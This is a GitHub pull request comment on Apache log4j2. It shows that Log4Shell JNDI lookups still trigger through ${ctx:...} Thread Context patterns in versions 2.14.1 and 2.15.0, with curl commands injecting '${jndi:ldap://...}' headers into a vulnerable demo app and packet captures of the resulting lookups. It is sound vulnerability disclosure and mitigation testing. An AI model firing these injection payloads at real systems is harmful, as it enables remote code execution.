SpComb edited a comment on pull request #608: URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993469509
> Following up on my question if this fixes usage with other property substitutions like ctx: [#608 (comment)](https://github.com/apache/logging-log4j2/pull/608#issuecomment-992427010)
>
> Apparently I could confirm my assumption regarding the usage of Thread Context Map, I created a PR here ([lunasec-io/lunasec#298](https://github.com/lunasec-io/lunasec/pull/298)) and made changes to the demonstration app to demonstrate the vulnerability even with `formatMsgNoLookups=true` set shown here: https://github.com/kmindi/log4shell-vulnerable-app.
>
> Here is also the diff to see what I changed to demonstrate vulnerable `${ctx.apiversion}` usage in the log pattern: [kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19)
>
> Can someone confirm this?

Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas the attacker-controlled input in the message field does not:

```
41 17.676741911 172.17.0.1 -> 172.17.0.2 HTTP 209 GET / HTTP/1.1
42 17.676769664 172.17.0.2 -> 172.17.0.1 TCP 66 8080 > 56934 [ACK] Seq=1 Ack=144 Win=30080 Len=0 TSval=346936700 TSecr=2382643118
43 17.680613689 172.17.0.2 -> 10.52.0.2 DNS 79 Standard query 0xffa9 A example.net
44 17.680814368 10.52.0.2 -> 172.17.0.2 DNS 79 Standard query response 0xffa9 No such name
45 17.687397342 172.17.0.2 -> 172.17.0.1 HTTP 193 HTTP/1.1 200 (text/plain)
```

The bad news: this seems to also work with 2.15.0, `X-Api-Version: ${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389:

```
$ docker exec -it log4shell-vulnerable-app jar -tvf /app/spring-boot-application.jar | grep log4j
    828 Tue Dec 14 11:55:34 GMT 2021 BOOT-INF/classes/log4j2.properties
  24231 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-slf4j-impl-2.15.0.jar
1789769 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-core-2.15.0.jar
  30947 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-jul-2.15.0.jar
 301804 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-api-2.15.0.jar
```

```
$ curl -v "$(docker inspect -f '{{.NetworkSettings.IPAddress}}' log4shell-vulnerable-app):8080/" -H 'X-Api-Version: ${jndi:ldap://localhost/test}'
*   Trying 172.17.0.2:8080...
* Connected to 172.17.0.2 (172.17.0.2) port 8080 (#0)
> GET / HTTP/1.1
> Host: 172.17.0.2:8080
> User-Agent: curl/7.76.1
> Accept: */*
> X-Api-Version: ${jndi:ldap://localhost/test}
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 13
< Date: Tue, 14 Dec 2021 11:57:10 GMT
<
* Connection #0 to host 172.17.0.2 left intact
Hello, world![
```

```
$ sudo nsenter -t "$(docker inspect -f '{{.State.Pid}}' log4shell-vulnerable-app)" -n tshark -i lo -n
Running as user "root" and group "root". This could be dangerous.
Capturing on 'Loopback'
    1 0.000000000 127.0.0.1 -> 127.0.0.1 TCP 74 38380 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426441 TSecr=0 WS=128
    2 0.000013194 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38380 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
    3 0.023625945 127.0.0.1 -> 127.0.0.1 TCP 74 38382 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426464 TSecr=0 WS=128
    4 0.023636425 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38382 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
    5 0.027652034 127.0.0.1 -> 127.0.0.1 TCP 74 38384 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426468 TSecr=0 WS=128
    6 0.027662963 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38384 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
    7 0.042974136 127.0.0.1 -> 127.0.0.1 TCP 74 38386 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426484 TSecr=0 WS=128
    8 0.042985398 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38386 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
```

This requires a [pattern configured to use `${ctx:...}` lookups](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/resources/log4j2.properties#L15-L16) with [attacker-controlled `ThreadContext` values](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java#L20-L22), which seem to get expanded recursively. The 2.15.x JNDI restrictions work correctly (no DNS lookups for `example.net`, only `localhost` connections), but the 2.10.x `-Dlog4j2.formatMsgNoLookups=true` / 2.15.x https://issues.apache.org/jira/browse/LOG4J2-3198 "disable message lookups by default" does not seem to apply to `${ctx:...}` lookups.
